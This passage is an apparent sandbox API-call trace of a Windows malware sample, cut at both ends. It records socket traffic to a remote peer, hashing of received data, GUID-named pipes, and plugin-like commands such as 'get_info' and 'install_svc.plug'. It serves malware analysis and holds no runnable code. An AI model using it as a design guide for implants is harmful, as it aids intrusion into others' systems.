(_Str="") returned 0x0 [0047.318] WSASend (in: s=0x214, lpBuffers=0x516fcb8*=((len=0x5e, buf=0x26268a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fcb8*=((len=0x5e, buf=0x26268a8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0047.319] CryptAcquireContextW (in: phProv=0x2fa98, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2fa98*=0x2dbe5d0) returned 1 [0047.319] CryptAcquireContextW (in: phProv=0x2fa98, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2fa98*=0x2dbe658) returned 1 [0047.320] CryptCreateHash (in: hProv=0x2dbe658, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x2fa9c | out: phHash=0x2fa9c) returned 1 [0047.320] CryptHashData (hHash=0x2da4130, pbData=0x26328c0, dwDataLen=0x3962, dwFlags=0x0) returned 1 [0047.320] CryptGetHashParam (in: hHash=0x2da4130, dwParam=0x4, pbData=0x516fd2c, pdwDataLen=0x516fd30, dwFlags=0x0 | out: pbData=0x516fd2c, pdwDataLen=0x516fd30) returned 1 [0047.320] CryptGetHashParam (in: hHash=0x2da4130, dwParam=0x2, pbData=0x26011f0, pdwDataLen=0x516fd30, dwFlags=0x0 | out: pbData=0x26011f0, pdwDataLen=0x516fd30) returned 1 [0047.320] CryptDestroyHash (hHash=0x2da4130) returned 1 [0047.320] CryptReleaseContext (hProv=0x2dbe658, dwFlags=0x0) returned 1 [0047.321] GetProcessId (Process=0xffffffff) returned 0xaa8 [0047.321] CoCreateGuid (in: pguid=0x516fd10 | out: pguid=0x516fd10*(Data1=0xd598dec5, Data2=0x4d80, Data3=0x43a6, Data4=([0]=0xa7, [1]=0xa, [2]=0x9b, [3]=0x52, [4]=0x5c, [5]=0xd4, [6]=0x2b, [7]=0x6e))) returned 0x0 [0047.321] _snprintf (in: _Dest=0x516fc60, _Count=0x78, _Format="%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" | out: _Dest="d598dec5-4d80-43a6-a70a-9b525cd42b6e") returned 36 [0047.321] strlen (_Str="d598dec5-4d80-43a6-a70a-9b525cd42b6e") returned 0x24 [0047.321] strlen (_Str="d598dec5-4d80-43a6-a70a-9b525cd42b6e") returned 0x24 [0047.321] strlen (_Str="d598dec5-4d80-43a6-a70a-9b525cd42b6e") returned 0x24 [0047.321] CreateNamedPipeA (lpName="\\\\.\\pipe\\d598dec5-4d80-43a6-a70a-9b525cd42b6e" (normalized: "\\device\\namedpipe\\d598dec5-4d80-43a6-a70a-9b525cd42b6e"), dwOpenMode=0x40080003, dwPipeMode=0x0, nMaxInstances=0x1, nOutBufferSize=0x0, nInBufferSize=0x0, nDefaultTimeOut=0x1388, lpSecurityAttributes=0x0) returned 0x25c [0047.321] CreateIoCompletionPort (FileHandle=0x25c, ExistingCompletionPort=0x1e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x1e0 [0047.321] ConnectNamedPipe (in: hNamedPipe=0x25c, lpOverlapped=0x262c0a8 | out: lpOverlapped=0x262c0a8) returned 0 [0047.321] GetLastError () returned 0x3e5 [0047.321] strlen (_Str="\\\\.\\pipe\\") returned 0x9 [0047.322] strlen (_Str="get_info") returned 0x8 [0047.322] strlen (_Str="get_info") returned 0x8 [0047.322] strlen (_Str="get_info") returned 0x8 [0047.322] GetCurrentProcess () returned 0xffffffff [0047.322] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x268 [0047.322] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4de9850, lpParameter=0x262b0f8, dwCreationFlags=0x0, lpThreadId=0x262b124 | out: lpThreadId=0x262b124*=0xad8) returned 0x270 [0047.322] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x244 [0047.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x24c [0047.322] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4dd58fc, lpParameter=0x2626978, dwCreationFlags=0x0, lpThreadId=0x2626980 | out: lpThreadId=0x2626980*=0xadc) returned 0x278 [0047.323] strlen (_Str="") returned 0x0 [0047.323] strlen (_Str="") returned 0x0 [0047.323] CreateIoCompletionPort (FileHandle=0x260, ExistingCompletionPort=0x268, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x268 [0047.323] PostQueuedCompletionStatus (CompletionPort=0x268, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2642648) returned 1 [0047.323] PostQueuedCompletionStatus (CompletionPort=0x268, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620d94) returned 1 [0047.323] WaitForSingleObject (hHandle=0x274, dwMilliseconds=0x7530) returned 0x0 [0047.324] CloseHandle (hObject=0x274) returned 1 [0047.324] GetCurrentThreadId () returned 0xac0 [0047.324] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0047.324] GetLastError () returned 0x3e5 [0047.324] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.324] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.324] GetCurrentThreadId () returned 0xac0 [0047.324] ReadFile (in: hFile=0x25c, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 1 [0047.324] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.324] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.325] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.340] strlen (_Str="get_info") returned 0x8 [0047.340] strlen (_Str="E8C4C3335547A1F8233DECC5937C0BE4E33D3D50") returned 0x28 [0047.340] WSASend (in: s=0x214, lpBuffers=0x516fdd0*=((len=0x86, buf=0x2620ab0*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fdd0*=((len=0x86, buf=0x2620ab0*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0047.340] strlen (_Str="core") returned 0x4 [0047.340] strlen (_Str="core") returned 0x4 [0047.341] strlen (_Str="core") returned 0x4 [0047.341] GetCurrentThreadId () returned 0xac0 [0047.341] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.341] WSASend (in: s=0x214, lpBuffers=0x516fec8*=((len=0x2b, buf=0x2620c70*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec8*=((len=0x2b, buf=0x2620c70*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0047.341] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.341] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.341] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.591] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0047.591] GetLastError () returned 0x3e5 [0047.591] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.591] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.641] strlen (_Str="core") returned 0x4 [0047.641] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0047.641] strlen (_Str="get_info") returned 0x8 [0047.641] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0xf57, buf=0x2636608*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0xf57, buf=0x2636608*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0047.641] GetCurrentThreadId () returned 0xac0 [0047.641] ReadFile (in: hFile=0x25c, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0047.641] GetLastError () returned 0x3e5 [0047.641] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.641] strlen (_Str="get_info") returned 0x8 [0047.641] strlen (_Str="core") returned 0x4 [0047.641] strlen (_Str="get_info") returned 0x8 [0047.641] strlen (_Str="get_info") returned 0x8 [0047.641] GetCurrentThreadId () returned 0xac0 [0047.641] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.642] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.877] strlen (_Str="get_info") returned 0x8 [0047.877] GetCurrentThreadId () returned 0xac0 [0047.877] CreateTimerQueueTimer (in: phNewTimer=0x2601234, TimerQueue=0x0, Callback=0x4de9f72, Parameter=0x2601230, DueTime=0x7530, Period=0x0, Flags=0x8 | out: phNewTimer=0x2601234*=0x2da4130) returned 1 [0047.877] strlen (_Str="get_info") returned 0x8 [0047.877] strlen (_Str="E8C4C3335547A1F8233DECC5937C0BE4E33D3D50") returned 0x28 [0047.877] WSASend (in: s=0x214, lpBuffers=0x516fd54*=((len=0x86, buf=0x264fb68*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd54*=((len=0x86, buf=0x264fb68*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0047.878] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0047.878] GetLastError () returned 0x3e5 [0047.878] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.878] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.878] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.879] GetCurrentProcess () returned 0xffffffff [0047.879] strlen (_Str="get_info") returned 0x8 [0047.879] strlen (_Str="get_info") returned 0x8 [0047.879] GetCurrentThreadId () returned 0xac0 [0047.879] CancelIo (hFile=0x25c) returned 1 [0047.879] CloseHandle (hObject=0x25c) returned 1 [0047.879] GetCurrentThreadId () returned 0xac0 [0047.879] strlen (_Str="get_info") returned 0x8 [0047.879] strlen (_Str="E8C4C3335547A1F8233DECC5937C0BE4E33D3D50") returned 0x28 [0047.879] WSASend (in: s=0x214, lpBuffers=0x516fdec*=((len=0x86, buf=0x264fb68*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fdec*=((len=0x86, buf=0x264fb68*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0047.879] strlen (_Str="core") returned 0x4 [0047.879] strlen (_Str="core") returned 0x4 [0047.880] DeleteTimerQueueTimer (TimerQueue=0x0, Timer=0x2da4130, CompletionEvent=0x0) returned 1 [0047.880] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.880] WSASend (in: s=0x214, lpBuffers=0x516fec8*=((len=0x30, buf=0x2620ca8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec8*=((len=0x30, buf=0x2620ca8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0047.880] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.880] WSASend (in: s=0x214, lpBuffers=0x516fec8*=((len=0x2b, buf=0x2620ca8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec8*=((len=0x2b, buf=0x2620ca8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0047.880] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0047.880] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0048.148] WSASend (in: s=0x214, lpBuffers=0x516fda4*=((len=0x2f, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fda4*=((len=0x2f, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0048.148] GetCurrentThreadId () returned 0xac0 [0048.148] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0048.148] GetLastError () returned 0x3e5 [0048.148] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0048.148] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0073.660] SetEvent (hEvent=0x224) returned 1 [0073.660] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.148] strlen (_Str="core.build_time") returned 0xf [0078.151] WSASend (in: s=0x214, lpBuffers=0x516fd84*=((len=0x46, buf=0x26047a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd84*=((len=0x46, buf=0x26047a8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0078.151] GetCurrentThreadId () returned 0xac0 [0078.151] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0078.151] GetLastError () returned 0x3e5 [0078.151] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.151] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.384] strlen (_Str="install_svc.plug") returned 0x10 [0078.384] strlen (_Str="dl") returned 0x2 [0078.384] WSASend (in: s=0x214, lpBuffers=0x516fce8*=((len=0x42, buf=0x26047f8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fce8*=((len=0x42, buf=0x26047f8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0078.384] strlen (_Str="install_svc") returned 0xb [0078.384] strlen (_Str="install_svc") returned 0xb [0078.384] strlen (_Str="") returned 0x0 [0078.384] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0078.384] GetLastError () returned 0x3e5 [0078.384] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.385] WSASend (in: s=0x214, lpBuffers=0x516fec8*=((len=0x61, buf=0x2627918*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec8*=((len=0x61, buf=0x2627918*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0078.387] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.387] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.618] WSARecv (in: s=0x214, lpBuffers=0x516fee8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fee8*=((len=0x2800, buf=0x260a190*)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned 0 [0078.618] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.618] WSARecv (in: s=0x214, lpBuffers=0x516fee8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fee8*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0078.618] GetLastError () returned 0x3e5 [0078.618] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.658] WSASend (in: s=0x214, lpBuffers=0x516fd3c*=((len=0x2c, buf=0x2620ca8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd3c*=((len=0x2c, buf=0x2620ca8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0078.658] GetCurrentThreadId () returned 0xac0 [0078.658] WSARecv (in: s=0x214, lpBuffers=0x516fe60, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fe60*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0078.658] GetLastError () returned 0x3e5 [0078.658] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.658] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.890] strlen (_Str="install_svc") returned 0xb [0078.890] strlen (_Str="") returned 0x0 [0078.890] WSASend (in: s=0x214, lpBuffers=0x516fcb8*=((len=0x61, buf=0x2627918*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fcb8*=((len=0x61, buf=0x2627918*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0078.890] CryptAcquireContextW (in: phProv=0x2fa58, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2fa58*=0x2dbe658) returned 1 [0078.890] CryptAcquireContextW (in: phProv=0x2fa58, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2fa58*=0x2dbe6e0) returned 1 [0078.891] CryptCreateHash (in: hProv=0x2dbe6e0, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x2fa5c | out: phHash=0x2fa5c) returned 1 [0078.891] CryptHashData (hHash=0x2da4130, pbData=0x2644730, dwDataLen=0x378e, dwFlags=0x0) returned 1 [0078.891] CryptGetHashParam (in: hHash=0x2da4130, dwParam=0x4, pbData=0x516fd2c, pdwDataLen=0x516fd30, dwFlags=0x0 | out: pbData=0x516fd2c, pdwDataLen=0x516fd30) returned 1 [0078.891] CryptGetHashParam (in: hHash=0x2da4130, dwParam=0x2, pbData=0x2601290, pdwDataLen=0x516fd30, dwFlags=0x0 | out: pbData=0x2601290, pdwDataLen=0x516fd30) returned 1 [0078.891] CryptDestroyHash (hHash=0x2da4130) returned 1 [0078.891] CryptReleaseContext (hProv=0x2dbe6e0, dwFlags=0x0) returned 1 [0078.891] GetProcessId (Process=0xffffffff) returned 0xaa8 [0078.892] CoCreateGuid (in: pguid=0x516fd10 | out: 